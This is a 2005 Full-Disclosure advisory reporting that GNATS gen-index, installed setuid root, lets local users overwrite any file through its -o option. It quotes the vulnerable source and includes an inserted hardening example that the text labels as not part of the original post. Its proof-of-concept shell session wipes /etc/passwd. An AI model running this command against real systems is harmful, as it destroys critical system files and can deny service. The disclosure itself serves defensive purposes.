[Full-disclosure] GNATS - gen-index

From: Adam Zabrocki (pi3ki31ny_at_wp.pl)
Date: 07/06/05

Date: Wed,  6 Jul 2005 17:08:11 +0200
To: full-disclosure@lists.grok.org.uk

Name: GNATS - gen-index
Vendor URL: http://www.gnu.org/software/gnats
Author: Adam Zabrocki <pi3ki31ny@wp.pl>
Date: June 16, 2005

Issue:

GNATS, the GNU problem report management system, allows a local attacker
to overwrite arbitrary files with root privileges on systems where GNATS
is installed with gen-index setuid root (which happens when GNATS is
compiled from source on a system that has no gnats user).

Description:

GNATS stores all information about the problem reports at a central
site, and enables users to access this site by various means, including
e-mail, WWW, and a network daemon. New problem reports can be created,
and existing reports can be queried and updated, by most of these means.

Details:

Any file on the system can be overwritten via the gen-index program
installed with GNATS.

Local users able to run gen-index (which is installed setuid root when
GNATS is compiled from source on a system with no gnats user and group)
can overwrite any file on the system. The problem lies in gen-index's
main() function, which does not validate the output path passed with
-o: it simply opens that path for writing and writes its own data there.

"gnats/gen-index.c"
int
main (int argc, char **argv)
{
  ...
  ...

    while ((optc = getopt_long (argc, argv, "o:hd:nVie",
                                long_options, (int *) 0)) != EOF)
    {
      switch (optc)
        {
        ...
        ...
        case 'o':
          file_name = optarg;
          break;

        case 'n':
          numeric_sorting = TRUE;
          break;
        ...
        ...
        }
    }

  ...
  ...

  if (file_name)
    output = fopen (file_name, "w+");
  if (output == (FILE *) NULL)
    {
      fprintf (stderr, "%s: can't write to %s: %s\n", program_name,
               optarg, strerror (errno));
      exit (3);
    }

  ...
  ...

  if (indexIsBinary (database))
    {
      char numFields = indexFieldCount (database);
      fwrite (&numFields, 1, 1, output);
    }

  ...
  ...
  if (numeric_sorting && num_entries > 0)
    {
      qsort (entries, num_entries, sizeof (Entry), entry_cmp);
      for (i = 0; i < num_entries; i++)
        {
          fwrite (entries[i].string, 1, entries[i].length, output);
        }
    }

  fclose (output);
  ...
  exit (0);
}

fopen() with mode "w+" opens the file for reading and writing; the file
is created if it does not exist, and truncated to zero length otherwise.
So when gen-index runs with setuid-root privileges, any file on the
system can be truncated and overwritten by pointing -o at it.
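The fopen("w+") pattern above next to one way of hardening it, as an added example that is not GNATS code and not part of the original post: the vulnerable opener runs the open with the process's effective privileges, while the hardened opener switches the effective uid/gid to the invoking user's real ids before the open(2) and refuses symlinks with O_NOFOLLOW, so a setuid binary can only create or truncate what the caller could already write. The function names, the /tmp demo paths and the sample file content are assumptions constructed for the example. Run unprivileged, as the demo does, the uid/gid switches are no-ops and only the open(2) semantics are exercised.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, as in gen-index main(): the -o path is opened with the
 * process's effective privileges, so under setuid root it can truncate any file. */
FILE *open_output_privileged(const char *path)
{
    return fopen(path, "w+");
}

/* Hardened pattern (added example, not GNATS code): open the output file as the
 * real uid/gid of the invoking user, so a setuid binary can only create or
 * truncate what that user could already write, and never follow a symlink. */
FILE *open_output_as_caller(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    int fd, saved_errno;

    /* Switch to the caller's identity, group first (once the effective uid is
     * non-root the gid could no longer be changed). No-ops without setuid. */
    if (setegid(rgid) != 0 || seteuid(ruid) != 0)
        return NULL;
    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    saved_errno = errno;
    /* Regain the saved privileges for the rest of the program. */
    if (seteuid(euid) != 0 || setegid(egid) != 0) {
        if (fd >= 0) close(fd);
        return NULL;
    }
    if (fd < 0) {
        errno = saved_errno;
        return NULL;
    }
    return fdopen(fd, "w");
}

/* Size of a file in bytes, or -1 if it cannot be stat'ed. */
long file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? (long)st.st_size : -1;
}

/* Write an index through the hardened opener: 0 on success, -1 on error. */
int write_index(const char *path, const char *data)
{
    FILE *out = open_output_as_caller(path);
    if (out == NULL) return -1;
    size_t len = strlen(data);
    int ok = fwrite(data, 1, len, out) == len;
    return (fclose(out) == 0 && ok) ? 0 : -1;
}

/* Demonstration in a private /tmp directory (paths assumed, file content
 * constructed): the vulnerable opener empties an existing file outright; the
 * hardened one rejects a symlink and writes a regular file. 0 if both hold. */
int demo(void)
{
    char dir[] = "/tmp/genindexXXXXXX", target[64], lnk[64];
    int rc = 0;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/link", dir);

    /* Pre-existing file with content, standing in for /etc/passwd. */
    FILE *f = fopen(target, "w");
    if (f == NULL) return -1;
    fputs("root:x:0:0:root:/root:/bin/sh\n", f);
    fclose(f);

    /* "w+" truncates on open: the file is already empty before any fwrite. */
    FILE *v = open_output_privileged(target);
    if (v == NULL || file_size(target) != 0) rc = -1;
    if (v != NULL) fclose(v);

    /* A symlink to the target is refused with ELOOP by O_NOFOLLOW ... */
    if (symlink(target, lnk) != 0) rc = -1;
    else if (open_output_as_caller(lnk) != NULL || errno != ELOOP) rc = -1;

    /* ... while a regular file the caller owns is written as expected. */
    if (write_index(target, "3\n") != 0 || file_size(target) != 2) rc = -1;

    unlink(lnk); unlink(target); rmdir(dir);
    return rc;
}

int main(void)
{
    puts(demo() == 0 ? "demo ok" : "demo failed");
    return 0;
}
```

The demo mirrors the PoC below without touching anything outside /tmp: the pre-existing "target" file loses its contents the moment the vulnerable opener returns, before a single byte is written. Switching the effective ids around the open(2) is the minimal fix; the same effect is obtained by not installing gen-index setuid root in the first place (it is only meant to run as the gnats user).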

Exploit:

We don't need to write any 31337 exploit. Simple PoC:

pi3@darkstar:~$ pwd
/home/pi3
pi3@darkstar:~$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 795 May 19 18:49 /etc/passwd
pi3@darkstar:~$ ls -alh /usr/local/libexec/gnats/gen-index
-r-sr-xr-x 1 root root 465k Nov 21  2004 /usr/local/libexec/gnats/gen-index*
pi3@darkstar:~$ /usr/local/libexec/gnats/gen-index -n -o /etc/passwd
pi3@darkstar:~$ ls -alh /etc/passwd
-rw-r--r-- 1 root root 1 Jun 16 17:34 /etc/passwd
pi3@darkstar:~$ cat /etc/passwd
pi3@darkstar:~$

GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all previous
versions are also vulnerable.

I have informed the GNATS team.

--
pi3 (pi3ki31ny) - pi3ki31ny@wp.pl
http://www.pi3.int.pl
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
